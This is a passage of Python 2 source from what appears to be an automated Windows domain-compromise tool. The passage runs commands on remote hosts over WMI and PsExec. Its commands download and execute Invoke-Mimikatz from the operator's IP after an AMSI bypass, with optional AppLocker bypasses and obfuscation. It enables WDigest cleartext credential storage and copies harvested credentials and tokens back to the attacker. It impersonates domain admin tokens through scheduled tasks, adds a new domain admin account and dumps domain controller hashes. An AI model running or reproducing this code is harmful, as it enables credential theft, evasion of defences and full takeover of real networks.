foundStart==True:\n            if addressInNetwork(targetIP, x)==False:\n                print (setColor(\"[+]\", bold, color=\"green\"))+\" | \"+targetIP+\":445 \"+(setColor(\" [route]\", bold, color=\"green\"))+\" | \"+x+(setColor(\" [Pivot] \", bold, color=\"green\"))\n            else:\n                print (setColor(\"[*]\", bold, color=\"blue\"))+\" | \"+targetIP+\":445 \"+(setColor(\" [route]\", bold, color=\"green\"))+\" | \"+x\n        else:\n            print (setColor(\"[*]\", bold, color=\"blue\"))+\" | \"+targetIP+\":445 \"+(setColor(\" [route]\", bold, color=\"green\"))+\" | \"+x\n\n\ndef updateMimiStaging(targetIP,domain,username,password,passwordHash):\n    if amsiMode==True:\n        print (setColor(\"[+]\", bold, color=\"green\"))+\" \"+targetIP+\":445 | \"+domain+\"\\\\\"+username+\":\"+password+\" | \"+(setColor(\"[amsi][mimikatz] \", bold, color=\"green\"))+\"| Enable AMSI Bypass on Win10\"\n    oldFile=origScriptPath+\"/modules/mimiStage1.ps1.template\"\n    newFile=origScriptPath+\"/modules/mimiStage1.ps1\"\n    f1 = open(oldFile, 'r')\n    f2 = open(newFile, 'w')\n    for line in f1:\n        f2.write(line.replace('x.x.x.x', myIP))\n    f1.close()\n    f2.close()    \n\n    oldFile=origScriptPath+\"/modules/mimiStage2.ps1.template\"\n    newFile=origScriptPath+\"/modules/mimiStage2.ps1\"\n    f1 = open(oldFile, 'r')\n    f2 = open(newFile, 'w')\n    for line in f1:\n        f2.write(line.replace('x.x.x.x', myIP))\n    f1.close()\n    f2.close()    \n\n    powershellPath=getPowershellPath(targetIP,domain,username,password,passwordHash)\n\n    if applockerBypass==True:\n        command=' IEX (New-Object Net.WebClient).DownloadString(\\'http://'+myIP+':8000/mimiStage1.ps1\\'); Invoke-Mimikatz \\\"privilege::debug\\\" \\\"sekurlsa::logonpasswords\\\" \\\"exit\\\"'\n        newCmd=''\n        randomCount=(randint(1, 2))\n        if randomCount==1:\n            newCmd=appLockerBypass2(targetIP, domain, username, password, passwordHash,command)\n        if randomCount==2:\n            newCmd=appLockerBypass3(targetIP, domain, username, password, passwordHash,command)\n        if randomCount==3:\n            newCmd=appLockerBypass4(targetIP, domain, username, password, passwordHash,command)\n        if debugMode==True:                        \n            print newCmd\n        results,status=runWMIEXEC(targetIP, domain, username, password, passwordHash,newCmd) \n    else:\n        command=powershellPath+\" \"+powershellArgs+\"-Command IEX (New-Object Net.WebClient).DownloadString('http://\"+myIP+\":8000/mimiStage1.ps1'); Invoke-Mimikatz \\\"privilege::debug\\\" \\\"sekurlsa::logonpasswords\\\" \\\"exit\\\"\"\n        results,status=runWMIEXEC(targetIP, domain, username, password, passwordHash,command) \n\n    #results,status=runWMIEXEC(targetIP, domain, username, password, passwordHash,command) \n    tmpPasswordList=parseMimikatzOutput(results)\n    if debugMode==True:\n        print command\n        print results\n    if len(tmpPasswordList)<1:\n        print (setColor(\"[+]\", bold, color=\"green\"))+\" \"+targetIP+\":445 | \"+(setColor(\"[wdigest]\", color=\"green\"))+\" | Add UseLogonCrdential reg key\"              \n        cmd='reg add HKLM\\\\SYSTEM\\\\CurrentControlSet\\\\Control\\\\SecurityProviders\\\\WDigest /v UseLogonCredential /t REG_DWORD /d 1 /f'\n        results,status=runWMIEXEC(targetIP, domain, username, password, passwordHash,cmd) \n\n    if len(tmpPasswordList)>0:\n        for x in tmpPasswordList:\n            tmpDomain=x[0]\n            tmpUsername=x[1]\n            tmpPassword=x[2]\n            print (setColor(\"[+]\", bold, color=\"green\"))+\" \"+targetIP+\":445 | \"+(setColor(\"[mimikatz]\", color=\"green\"))+\" | \"+tmpDomain+\"\\\\\"+tmpUsername+\":\"+tmpPassword+(setColor(\" [Found] \", bold, color=\"green\"))                \n        return tmpPasswordList\n\ndef runMimikatz(targetIP,domain,username,password,passwordHash):\n    tmpPasswordList1=[]\n    tmpPasswordList=[]\n    results=''\n    if testAccountSilent(targetIP, domain, username, password, passwordHash)==True:\n        if domain==None or len(domain)<1:\n            domain='WORKGROUP'\n        command='systeminfo | findstr /B /C:\"OS Name\"'\n        results,status=runWMIEXEC(targetIP, domain, username, password, passwordHash,command) \n        if \"Microsoft Windows 10\" in str(results):\n            tmpPasswordList=updateMimiStaging(targetIP,domain,username,password,passwordHash)\n        else:\n            psAvailStatus=testPowershell(targetIP, domain, username, password, passwordHash)\n            if psAvailStatus==True:\n                powershellPath=getPowershellPath(targetIP,domain,username,password,passwordHash)\n                if obfuscatedMode==False:  \n                    if amsiMode==True:\n                        if password==None:\n                            print (setColor(\"[+]\", bold, color=\"green\"))+\" \"+targetIP+\":445 | \"+domain+\"\\\\\"+username+\":\"+passwordHash+\" | \"+(setColor(\"[amsi][mimikatz] \", bold, color=\"green\"))+\"Running Mimikatz\"\n                        else:\n                            print (setColor(\"[+]\", bold, color=\"green\"))+\" \"+targetIP+\":445 | \"+domain+\"\\\\\"+username+\":\"+password+\" | \"+(setColor(\"[amsi][mimikatz] \", bold, color=\"green\"))+\"Running Mimikatz\"\n                        tmpCmd='reg query \"HKLM\\\\SOFTWARE\\\\Microsoft\\\\NET Framework Setup\\\\NDP\\\\v2.0.50727\" /v Version'\n                        results,status=runWMIEXEC(targetIP, domain, username, password, passwordHash,tmpCmd)\n                        if '2.0.50727.4927' in results:\n                            command=powershellPath+\" -Version 2 \"+powershellArgs+\" IEX \\\"(New-Object Net.WebClient).DownloadString(\\'http://\"+myIP+\":8000/Invoke-Mimikatz.ps1\\'); Invoke-Mimikatz -DumpCreds\\\"\"  \n                        else:\n                            amsiBypassStr=\"[Runtime.InteropServices.Marshal]::WriteInt32([Ref].Assembly.GetType('System.Management.Automation.AmsiUtils').GetField('amsiContext',[Reflection.BindingFlags]'NonPublic,Static').GetValue($null),0x41414141)\"\n                            command=powershellPath+\" \"+powershellArgs+\"-Command \"+amsiBypassStr+\"; IEX \\\"(New-Object Net.WebClient).DownloadString(\\'http://\"+myIP+\":8000/Invoke-Mimikatz.ps1\\'); Invoke-Mimikatz -DumpCreds\\\"\"  \n                    else:           \n                        if password==None:\n                            print (setColor(\"[+]\", bold, color=\"green\"))+\" \"+targetIP+\":445 | \"+domain+\"\\\\\"+username+\":\"+passwordHash+\" | \"+(setColor(\"[mimikatz] \", bold, color=\"green\"))+\"Running Mimikatz\"        \n                        else:\n                            print (setColor(\"[+]\", bold, color=\"green\"))+\" \"+targetIP+\":445 | \"+domain+\"\\\\\"+username+\":\"+password+\" | \"+(setColor(\"[mimikatz] \", bold, color=\"green\"))+\"Running Mimikatz\"        \n                        command=powershellPath+\" \"+powershellArgs+\" IEX \\\"(New-Object Net.WebClient).DownloadString(\\'http://\"+myIP+\":8000/Invoke-Mimikatz.ps1\\'); Invoke-Mimikatz -DumpCreds\\\"\"                                          \n                else:\n                    if amsiMode==True:\n                        if password==None:\n                            print (setColor(\"[+]\", bold, color=\"green\"))+\" \"+targetIP+\":445 | \"+domain+\"\\\\\"+username+\":\"+passwordHash+\" | \"+(setColor(\"[amsi][obfs][mimikatz] \", bold, color=\"green\"))+\"Running Mimikatz\"\n                        else:\n                            print (setColor(\"[+]\", bold, color=\"green\"))+\" \"+targetIP+\":445 | \"+domain+\"\\\\\"+username+\":\"+password+\" | \"+(setColor(\"[amsi][obfs][mimikatz] \", bold, color=\"green\"))+\"Running Mimikatz\"\n                        tmpCmd='reg query \"HKLM\\\\SOFTWARE\\\\Microsoft\\\\NET Framework Setup\\\\NDP\\\\v2.0.50727\" /v Version'\n                        results,status=runWMIEXEC(targetIP, domain, username, password, passwordHash,tmpCmd)\n                        if '2.0.50727.4927' in results:\n                            command=powershellPath+\" -Version 2 \"+powershellArgs+\" IEX \\\"(New-Object Net.WebClient).DownloadString(\\'http://\"+myIP+\":8000/Invoke-Mimikatz-obfs.ps1\\'); Invoke-Mimikatz -DumpCreds\\\"\"  \n                        else:\n                            amsiBypassStr=\"[Runtime.InteropServices.Marshal]::WriteInt32([Ref].Assembly.GetType('System.Management.Automation.AmsiUtils').GetField('amsiContext',[Reflection.BindingFlags]'NonPublic,Static').GetValue($null),0x41414141)\"\n                            command=powershellPath+\" \"+powershellArgs+\"-Command \"+amsiBypassStr+\"; IEX \\\"(New-Object Net.WebClient).DownloadString(\\'http://\"+myIP+\":8000/Invoke-Mimikatz-obfs.ps1\\'); Invoke-Mimikatz -DumpCreds\\\"\"  \n                    else:\n                        print (setColor(\"[+]\", bold, color=\"green\"))+\" \"+targetIP+\":445 | \"+domain+\"\\\\\"+username+\":\"+password+\" | \"+(setColor(\"[obfs][mimikatz] \", bold, color=\"green\"))+\"Running Mimikatz\"\n                        command=powershellPath+\" \"+powershellArgs+\" IEX \\\"(New-Object Net.WebClient).DownloadString(\\'http://\"+myIP+\":8000/Invoke-Mimikatz-obfs.ps1\\'); Invoke-Mimikatz -DumpCreds\\\"\"  \n                if debugMode==True:\n                    print command\n                results,status=runWMIEXEC(targetIP, domain, username, password, passwordHash,command) \n                if \"doesn't match OS architecture.\" in str(results):\n                    command=command.replace(\"\\\\SysWOW64\\\\\",\"\\\\System32\\\\\")\n                    results,status=runWMIEXEC(targetIP, domain, username, password, passwordHash,command) \n                temp_name = (next(tempfile._get_candidate_names()))+\".txt\"\n                f = open('/tmp/'+temp_name, 'w')\n                f.write(results) \n                f.close()\n                tmpData = [line.strip() for line in open('/tmp/'+temp_name, 'r')]\n                if \"This script contains malicious content and has been blocked by your antivirus\" in str(tmpData):\n                    print (setColor(\"[+]\", bold, color=\"green\"))+\" \"+targetIP+\":445 | \"+domain+\"\\\\\"+username+\":\"+password+\" | \"+(setColor(\"[amsi] \", bold, color=\"green\"))+\" Blocked by AMSI\"\n                else:\n                    tmpPasswordList=parseMimikatzOutput(results)\n                    if debugMode==True:\n                        print results\n                    if len(tmpPasswordList)>0:\n                        for x in tmpPasswordList:\n                            tmpDomain=(x[0]).lower()\n                            tmpUsername=(x[1]).lower()\n                            tmpPassword=x[2]\n                            print (setColor(\"[+]\", bold, color=\"green\"))+\" \"+targetIP+\":445 | \"+(setColor(\"[mimikatz]\", color=\"green\"))+\" | \"+tmpDomain+\"\\\\\"+tmpUsername+\":\"+tmpPassword+(setColor(\" [Found] \", bold, color=\"green\"))                \n                        addPasswords(targetIP,tmpPasswordList)\n                        if password==None:\n                            if len(domain)<1:\n                                domain=\"WORKGROUP\"\n                            if password!=None:\n                                tmpHostList=[]\n                                for z in accessAdmHostList:\n                                    tmpHostList.append(z[0])\n                                if targetIP not in tmpHostList:\n                                    if [targetIP, domain, username, password] not in accessAdmHostList:\n                                        accessAdmHostList.append([targetIP, str(domain), str(username), str(password)])\n                        else:\n                            if len(domain)<1:\n                                domain=\"WORKGROUP\"\n                            if password!=None:\n                                tmpHostList=[]\n                                for z in accessAdmHostList:\n                                    tmpHostList.append(z[0])\n                                if targetIP not in tmpHostList:\n                                    if [targetIP, domain, username, password] not in accessAdmHostList:\n                                        accessAdmHostList.append([targetIP, str(domain), str(username), str(password)])\n                    tmpPasswordList1=[]\n                    for x in tmpPasswordList:\n                        tmpDomain=(x[0]).lower()\n                        tmpUsername=(x[1]).lower()\n                        tmpPassword=x[2]\n                        tmpPasswordList1.append([targetIP,tmpDomain,tmpUsername,tmpPassword])\n            else:        \n                if obfuscatedMode==False:           \n                    cmd=\" IEX (New-Object Net.WebClient).DownloadString(\\'http://\"+myIP+\":8000/Invoke-Mimikatz.ps1\\'); Invoke-Mimikatz -DumpCreds | Out-File \\\\\\\\\"+myIP+\"\\\\guest\\\\\"+targetIP+\"_mimikatz.txt\"    \n                else:\n                    print (setColor(\"[*]\", bold, color=\"blue\"))+\" \"+targetIP+\":445 | \"+(setColor(\"[mimikatz][obfs]\", color=\"green\"))+\" | Enable Powershell Obfuscation\"\n                    cmd=\" IEX (New-Object Net.WebClient).DownloadString(\\'http://\"+myIP+\":8000/Invoke-Mimikatz-obfs.ps1\\'); Invoke-Mimikatz -DumpCreds | Out-File \\\\\\\\\"+myIP+\"\\\\guest\\\\\"+targetIP+\"_mimikatz.txt\"    \n\n                if applockerBypass==True:\n                    newCmd=''\n                    randomCount=(randint(1, 2))\n                    if randomCount==1:\n                        newCmd=appLockerBypass2(targetIP, domain, username, password, passwordHash,cmd)\n                    if randomCount==2:\n                        newCmd=appLockerBypass3(targetIP, domain, username, password, passwordHash,cmd)\n                    if randomCount==3:\n                        newCmd=appLockerBypass4(targetIP, domain, username, password, passwordHash,cmd)\n                    if debugMode==True:                        \n                        print newCmd\n                    '''\n                    if applockerBypass==True:  \n                    chosenNumber=1\n                    newCmd=''\n                    if chosenNumber==1:\n                        newCmd=appLockerBypass2(targetIP, domain, username, password, passwordHash, cmd)\n                    if chosenNumber==2:\n                        newCmd=appLockerBypass3(targetIP, domain, username, password, passwordHash, cmd)\n                        print (setColor(\"[*]\", bold, color=\"blue\"))+\" \"+targetIP+\":445 | \"+(setColor(\"[applocker]\", color=\"green\"))+\" | AppLocker Bypass Technique 3\"    \n                    if chosenNumber==3:\n                        newCmd=appLockerBypass4(targetIP, domain, username, password, passwordHash, cmd)\n                    if debugMode==True:\n                        print newCmd\n                    '''                        \n                    runWMIEXEC(targetIP, domain, username, password, passwordHash, newCmd) \n                    tmpFilename=targetIP+\"_mimikatz.txt\" \n                    foundFile=False\n                    resultsMimikatz=\"\"\n                    while foundFile==False:\n                        tmpFilename1=origScriptPath+\"/loot/\"+tmpFilename\n                        if os.path.exists(tmpFilename1) and (os.stat(tmpFilename1).st_size != 0):\n                            tmpFilename2=convertWinToLinux(tmpFilename1)\n                            with open(tmpFilename2, 'r') as content_file:\n                                resultsMimikatz = content_file.read()\n                                foundFile=True\n                        else:\n                            time.sleep(2)\n                    cmd ='schtasks /query  /tn \"microsoftschedulertest\"'\n                    results,status=runWMIEXEC(targetIP, domain, username, password, passwordHash,cmd) \n                    if \"Ready\" in results:\n                        cmd ='schtasks /Delete /TN microsoftschedulertest /f'\n                        runWMIEXEC(targetIP, domain, username, password, passwordHash,cmd) \n                    tmpPasswordList=parseMimikatzOutput(resultsMimikatz)\n                    for x in tmpPasswordList:\n                        tmpDomain=(x[0]).lower()\n                        tmpUsername=(x[1]).lower()\n                        tmpPassword=x[2]\n                        print (setColor(\"[+]\", bold, color=\"green\"))+\" \"+targetIP+\":445 | \"+(setColor(\"[mimikatz]\", color=\"green\"))+\" | \"+tmpDomain+\"\\\\\"+tmpUsername+\":\"+tmpPassword+(setColor(\" [Found] \", bold, color=\"green\"))  \n                    if len(tmpPasswordList)>0:\n                        addPasswords(targetIP,tmpPasswordList)\n                        if password==None:\n                            if len(domain)<1:\n                                domain=\"WORKGROUP\"\n                            if password!=None:\n                                tmpHostList=[]\n                                for z in accessAdmHostList:\n                                    tmpHostList.append(z[0])\n                                if targetIP not in tmpHostList:\n                                    if [targetIP, domain, username, password] not in accessAdmHostList:\n                                        accessAdmHostList.append([targetIP, str(domain), str(username), str(password)])\n                        else:\n                            if len(domain)<1:\n                                domain=\"WORKGROUP\"\n                            if password!=None:\n                                tmpHostList=[]\n                                for z in accessAdmHostList:\n                                    tmpHostList.append(z[0])\n                                if targetIP not in tmpHostList:\n                                    if [targetIP, domain, username, password] not in accessAdmHostList:\n                                        accessAdmHostList.append([targetIP, str(domain), str(username), str(password)])\n        for x in tmpPasswordList:\n            tmpDomain=(x[0]).lower()\n            tmpUsername=(x[1]).lower()\n            tmpPassword=(x[2])\n            tmpPasswordList1.append([targetIP,tmpDomain,tmpUsername,tmpPassword])\n    return tmpPasswordList1\n\ndef get_ip_address():\n    command=\"ifconfig | sed -En 's/127.0.0.1//;s/.*inet (addr:)?(([0-9]*\\.){3}[0-9]*).*/\\\\2/p'\"\n    results = runCommand(command, shell = True, timeout = 15) \n    resultList=results[1].split(\"\\n\")\n    return resultList[0]\n\ndef reverseLookup(ip):\n    domainShort=''\n    domainFull=''\n    domain=\"\"\n    command=\"nmap --script smb-os-discovery.nse -p445 \"+ip\n    results = runCommand(command, shell = True, timeout = 15) \n    resultList=results[1].split(\"\\n\")\n    for x in resultList:\n        if \"|   Domain name: \" in x:\n            x=x.replace(\"|   Domain name: \",\"\")\n            domain=x\n    domainFull=domain\n    if domain.count(\".\")>1:\n        domain=domain.split(\".\")[0]\n        domainShort=domain\n    return domainShort,domainFull\n\ndef powershell_encode(data):\n    blank_command = \"\"\n    powershell_command = \"\"\n    n = re.compile(u'(\\xef|\\xbb|\\xbf)')\n    for char in (n.sub(\"\", data)):\n        blank_command += char + \"\\x00\"\n    powershell_command = blank_command\n    powershell_command = base64.b64encode(powershell_command)\n    return powershell_command\n\ndef uploadFile(remoteFilename,localFilename,targetIP, domain, username, password, passwordHash):\n    command=\"copy \\\\\\\\\"+myIP+\"\\\\files\\\\\"+remoteFilename+\" C:\\\\windows\\\\temp /y\" \n    results,status=runWMIEXEC(targetIP, domain, username, password, passwordHash, command) \n    if debugMode==True:\n        print command\n        print results\n    #osArch64=getCPUType(targetIP,domain,username,password,passwordHash)\n    #powershellPath=getPowershellPath(osArch64)\n    #powershellArgs=' -windowstyle hidden -NoProfile -NoLogo -NonInteractive -Sta -ep bypass '\n    #command=powershellPath+\" \"+powershellArgs+\" -Command (New-Object System.Net.WebClient).DownloadFile('http://\"+myIP+\":8000/\"+remoteFilename+\"', 'C:\\\\windows\\\\temp\\\\\"+localFilename+\"')\"\n    #results=runWMIEXEC(targetIP, domain, username, password, passwordHash, command) \n    #if debugMode==True:\n    #    print command\n    #    print results \n\ndef getCPUType(targetIP,domain,username,password,passwordHash):\n    cmd=\"echo %PROCESSOR_ARCHITECTURE%\"\n    results,status=runWMIEXEC(targetIP, domain, username, password, passwordHash, cmd) \n    if results==\"AMD64\":\n        return True\n    if results==\"X86\":\n        return False\n\ndef getPowershellPath(targetIP,domain,username,password,passwordHash):\n    pathList=[]\n    pathList.append(\"C:\\\\windows\\\\SysWOW64\\\\WindowsPowerShell\\\\v1.0\\\\powershell.exe\")\n    pathList.append(\"C:\\\\windows\\\\system32\\\\WindowsPowerShell\\\\v1.0\\\\powershell.exe\")\n    for pathName in pathList:\n        cmd = 'dir '+pathName\n        results,status=runWMIEXEC(targetIP, domain, username, password, passwordHash, cmd) \n        if debugMode==True:\n            print cmd\n            print results\n        if \"The system cannot find the path specified.\" not in results:\n            return pathName\n\n\ndef getPowershellVersionBak(targetIP,domain,username,password,passwordHash):\n    powershellPath='powershell.exe'\n    powershellArgs=' -windowstyle hidden -NoProfile -NoLogo -NonInteractive -Sta -ep bypass '\n    command=powershellPath+\" \"+powershellArgs+\" -Command $Env:PROCESSOR_ARCHITECTURE\"\n    try:                    \n        results,status=runWMIEXEC(targetIP, domain, username, password, passwordHash,command)        \n        if \"AMD64\" in results:\n            return True\n        if \"x86\" in results:\n            return False\n    except:\n        return True\n\ndef tokensPriv(targetIP,domain,username,password,passwordHash):\n    global dcCompromised\n    global uncompromisedHostList\n    powershellPath=getPowershellPath(targetIP,domain,username,password,passwordHash)\n    testPowershell(targetIP, domain, username, password, passwordHash)\n    powershellArgs='  -NoProfile -NoLogo -NonInteractive -Sta -ep bypass '\n\n    tmpCmd=''\n    foundUser=''\n    dcNetbiosName=''\n    tmpSchedName=generateRandomStr()\n    tmpFilename=generateRandomStr()+\".bat\"\n    tmpFilename2=generateRandomStr()+\".bat\"\n    tmpFilename3=generateRandomStr()+\".bat\"\n    mimikatzOutputFilename=generateRandomStr()\n    (generateRandomStr())+\".ps1\"\n    if len(dcList)>0:\n        dcNetbiosName=getNetBiosName(dcList[0])\n    if obfuscatedMode==True:\n        command= \" IEX (New-Object Net.WebClient).DownloadString(\\'http://\"+myIP+\":8000/Invoke-TokenManipulation-obfs.ps1\\'); Invoke-TokenManipulation | Out-File \\\\\\\\\"+myIP+\"\\\\guest\\\\\"+targetIP+\"_tokens.txt\"       \n    else:\n        command= \" IEX (New-Object Net.WebClient).DownloadString(\\'http://\"+myIP+\":8000/Invoke-TokenManipulation.ps1\\'); Invoke-TokenManipulation | Out-File \\\\\\\\\"+myIP+\"\\\\guest\\\\\"+targetIP+\"_tokens.txt\"       \n    if applockerBypass==True:\n        randomCount=(randint(1, 2))\n        if randomCount==1:\n            tmpCmd=appLockerBypass2(targetIP, domain, username, password, passwordHash,command)\n        if randomCount==2:\n            tmpCmd=appLockerBypass3(targetIP, domain, username, password, passwordHash,command)\n        if randomCount==3:\n            tmpCmd=appLockerBypass4(targetIP, domain, username, password, passwordHash,command)\n        if debugMode==True:\n            print tmpCmd\n        results,status=runWMIEXEC(targetIP, domain, username, password, passwordHash,tmpCmd) \n        if debugMode==True:\n            print tmpCmd\n            print results\n    else:\n        command=powershellPath+\" \"+powershellArgs+\"\\\"\"+command+\"\\\"\"\n        results,status=runWMIEXEC(targetIP, domain, username, password, passwordHash,command) \n        if debugMode==True:\n            print command\n            print results\n\n    tmpFilename=targetIP+\"_tokens.txt\" \n    foundFile=False\n    results=\"\"\n    while foundFile==False:\n        tmpFilename1=origScriptPath+\"/loot/\"+tmpFilename\n        if os.path.exists(tmpFilename1) and (os.stat(tmpFilename1).st_size != 0):\n            tmpFilename2=convertWinToLinux(tmpFilename1)\n            with open(tmpFilename2, 'r') as content_file:\n                results = content_file.read()\n                foundFile=True\n        else:\n            time.sleep(2)\n    if \"SessionError\" not in str(results):\n        resultList=results.split(\"\\n\")\n        tmpTokenList=[]\n        tmpdomain=\"\"\n        tmpusername=\"\"    \n        for x in resultList:\n            if \"Domain              : \" in x:\n                x=x.replace(\"Domain              : \",\"\") \n                tmpdomain=x.strip()\n            if \"Username            : \" in x:\n                x=x.replace(\"Username            : \",\"\")\n                tmpusername=x.strip()\n                tmpdomain=tmpdomain.strip()\n                tmpusername=tmpusername.strip()\n                if len(tmpdomain)>0 and len(tmpusername)>0:\n                    tmpTokenList.append([tmpdomain,tmpusername])\n                tmpdomain=\"\"\n                tmpusername=\"\"\n        dcDomainNameList=[]\n        if len(dcList)>0:\n            getDomainAdminUsers(username,password,dcList[0])\n            dcDomainNameList=reverseLookup(dcList[0])\n\n        if len(tmpTokenList)>0:\n            for x in tmpTokenList:\n                if \"NT AUTHORITY\" not in x[0]:\n                    print (setColor(\"[+]\", bold, color=\"green\"))+\" \"+targetIP+\":445 | \"+(setColor(\"[tokens]\", color=\"green\"))+\" | \"+x[0]+\"\\\\\"+x[1]+(setColor(\" [Found] \", bold, color=\"green\"))  \n                else:\n                    print (setColor(\"[+]\", bold, color=\"green\"))+\" \"+targetIP+\":445 | \"+(setColor(\"[tokens]\", color=\"green\"))+\" | \"+x[0]+\"\\\\\"+x[1]+(setColor(\"  \", bold, color=\"green\"))  \n            tmpPasswordList=[]\n            for x in tmpTokenList:\n                tmpDomain=(x[0]).lower()\n                tmpUsername=x[1]\n                if len(tmpUsername)>0:\n                    if tmpUsername.lower() in domainAdminList and tmpDomain in dcDomainNameList:\n                        foundUser = tmpDomain+\"\\\\\"+tmpUsername\n                        print (setColor(\"[+]\", bold, color=\"green\"))+\" Found Domain Admin Token: '\"+foundUser+\"'\"\n\n                        #print \"[*] Checking Currently Logged On Users on Host: \"+targetIP\n                        command=' -Command \"Get-WMIObject -class Win32_ComputerSystem | select username\"'\n                        command=powershellPath+\" \"+powershellArgs+command\n                        #results=runWMIEXEC(targetIP, domain, username, password, passwordHash, command)    \n\n                        results,status=runWMIEXEC(targetIP, domain, username, password, passwordHash, command)\n                        #results=runPSEXEC(targetIP, domain, username, password, passwordHash, command)    \n                        tmpResultList=results.split(\"\\n\")\n                        foundStart=False\n                        loggedInUsersList=[]\n                        for x in tmpResultList:\n                            x=x.strip()            \n                            if len(x)>0:\n                                if foundStart==True:\n                                    if x not in loggedInUsersList:\n                                        loggedInUsersList.append(str(x).lower())  \n                                        print str(x).lower()\n                                if '--------' in x:\n                                    foundStart=True\n                        #print \"[*] UAC is Disabled on Host: \"+targetIP\n                        print \"[*] Attempting to Elevate Privileges Using Token: '\"+foundUser+\"'\"\n\n\n                        tmpUserList1=[]\n                        command=\"net localgroup administrators\"\n                        results,status=runWMIEXEC(targetIP, domain, username, password, passwordHash, command)\n                        tmpResultList=results.split(\"\\n\")\n                        tmpFound=False\n                        for y in tmpResultList:\n                            if tmpFound==True:\n                                if \"The command completed successfully.\" in y:\n                                    tmpFound=False\n                                else:\n                                    tmpUserList1.append((str(y).strip()).lower())         \n                            if \"------------------\" in y:\n                                tmpFound=True\n\n                        impersonateUser=''\n                        if len(tmpUserList1)>0:\n                            print (setColor(\"[*]\", bold, color=\"green\"))+\" List of Users in Administrators Group on Host: \"+ip\n                            for y in tmpUserList1:\n                                print y\n\n                            for user1 in loggedInUsersList:\n                                if (str(user1).lower()).strip() in tmpUserList1:\n                                    print (setColor(\"[+]\", bold, color=\"green\"))+\" Is '\"+str(user1).lower()+\"' in 'Administrators' group on Host \"+ip+\" \"+(setColor(\"Yes\", bold, color=\"green\"))\n                                    impersonateUser=str(user1).lower()\n                                else:\n                                    print \"[-] Is '\"+str(user1).lower()+\"' in 'Administrators' group on Host \"+ip+\" \"+(setColor(\"No\", bold, color=\"red\"))\n\n                        if len(impersonateUser)>0:                        \n                            print (setColor(\"[+]\", bold, color=\"green\"))+\" Adding new Domain Admin Account to Host: \"+ip\n                            target = open(tmpFilename3, 'w')\n                            cmd = 'net user /add '+tmpCreateUsername+' \"'+tmpCreatePassword+'\" /domain'\n                            target.write(cmd+\"\\r\\n\")\n                            cmd = 'net group \"Domain Admins\" '+tmpCreateUsername+' /add /domain'\n                            target.write(cmd+\"\\r\\n\")\n                            target.close()\n                            uploadFile(tmpFilename3,tmpFilename3,targetIP, domain, username, password, passwordHash)\n\n                            s='IEX (New-Object Net.WebClient).DownloadString(\\'http://'+myIP+':8000/Invoke-TokenManipulation.ps1\\');Invoke-TokenManipulation -CreateProcess \\'cmd.exe\\' -Username '+foundUser+' -ProcessArgs \\'/c C:\\\\windows\\\\TEMP\\\\'+tmpFilename3+'\\''\n                            #encodedPS=powershell_encode(s)\n                            cmd = powershellPath+\" -windowstyle hidden -NoProfile -NoLogo -NonInteractive -Sta -ep bypass  \"+s\n                            if debugMode==True:\n                                print cmd\n                            target = open(tmpFilename2, 'w')\n                            target.write(cmd)\n                            target.close()\n                            uploadFile(tmpFilename2,tmpFilename2,targetIP, domain, username, password, passwordHash)\n\n                            command='schtasks.exe /Delete /TN '+tmpSchedName+' /f'\n                            results=runPSEXEC(targetIP, domain, username, password, passwordHash, command)    \n                            if debugMode==True:\n                                print command\n                                print results\n\n                            command='schtasks.exe /Create /RL HIGHEST /RU '+impersonateUser+' /TN '+tmpSchedName+' /SC MONTHLY /M DEC /TR \"'\"C:\\\\windows\\\\temp\\\\\"+tmpFilename2+\"\\\"\"\n                            results,status=runWMIEXEC(targetIP, domain, username, password, passwordHash, command)    \n                            if debugMode==True:\n                                print command\n                                print results\n                            print \"[*] Running Tasks on Host: \"+targetIP\n                            command='schtasks /Run /TN '+tmpSchedName    \n                            results,status=runWMIEXEC(targetIP, domain, username, password, passwordHash, command)    \n                            if debugMode==True:\n                                print command\n                            checkComplete=False\n                            while checkComplete==False:\n                                command='schtasks /Query /TN '+tmpSchedName\n                                results,status=runWMIEXEC(targetIP, domain, username, password, passwordHash, command)            \n                                if debugMode==True:\n                                    print command\n                                tmpResultList=results.split(\"\\n\")\n                                for x in tmpResultList:\n                                    if tmpSchedName in x:\n                                        if \"Ready\" in x or \"Running\" in x:\n                                            if \"Ready\" in x:\n                                                print \"[*] Removing Tasks from Host: \"+targetIP\n                                                command='schtasks.exe /Delete /TN '+tmpSchedName+' /f'                \n                                                runWMIEXEC(targetIP, domain, username, password, passwordHash, command)    \n                                                checkComplete=True\n                                            if \"Running\" in x:\n                                                time.sleep(10)\n                            if dcCompromised==False:\n                                if len(dcList)>0:\n                                    isDA=getDomainAdminUsers(tmpCreateUsername,tmpCreatePassword,dcList[0])\n                                    if isDA==True:\n                                        domainShort,domainFull=reverseLookup(dcList[0])\n                                        print (setColor(\"\\nDumping Plaintext Credentials from Domain Controller: \"+ip, bold, color=\"green\"))\n                                        tmpPasswordList=runMimikatz(dcList[0],domainShort,tmpCreateUsername,tmpCreatePassword,None)    \n                                        for y in tmpPasswordList:\n                                            if y not in userPassList:\n                                                userPassList.append(y)\n\n                                        print (setColor(\"\\nDumping Hashes from Domain Controller: \"+dcList[0], bold, color=\"green\"))\n                                        tmpHashList=dumpDCHashes(dcList[0],domainShort,tmpCreateUsername,tmpCreatePassword,None)    \n                                        if len(tmpHashList)>0:\n                                            addHashes(dcList[0],tmpHashList)\n                                            if dcList[0] in uncompromisedHostList:\n                                                uncompromisedHostList.remove(dcList[0])\n                                            analyzeHashes(tmpHashList)\n                                        dcCompromised=True\n\n\ndef generateRandomStr():\n chars = string.letters + string.digits\n pwdSize = 20\n return ''.join((random.choice(chars)) for x in range(pwdSize))\n\ndef listUsers(targetIP,domain,username,password,passwordHash):\n    command='dir.exe C:\\Users /b /ad'\n    results,status=runWMIEXEC(targetIP, domain, username, password, passwordHash, command)    \n    tmpResultList=results.split(\"\\n\")\n    tmpResultList1=[]\n    for x in tmpResultList:\n        x=x.strip()\n        if \"File Not Found\"!=x and \"All Users\"!=x and \"Default\"!=x and \"Default User\"!=x and \"Public\"!=x:\n            if len(x)>0:\n                tmpResultList1.append(x)\n    return tmpResultList1\n\ndef listProcesses(targetIP,domain,username,password,passwordHash):\n    command=\"tasklist /NH /FO csv\"\n    results,status=runWMIEXEC(targetIP, domain, username, password, passwordHash, command)    \n    if debugMode==True:\n\tprint command\n\tprint results\n    #tmpResultList1=results[0].split(\"\\n\")\n    #tmpResultList2=[]\n    #for x in tmpResultList1:\n    #    processName=(x.split(\",\")[0])[1:-1]\n    #    if processName not in tmpResultList2:\n    #        if len(str(processName))>0:\n    #            tmpResultList2.append(str(processName))\n    #return 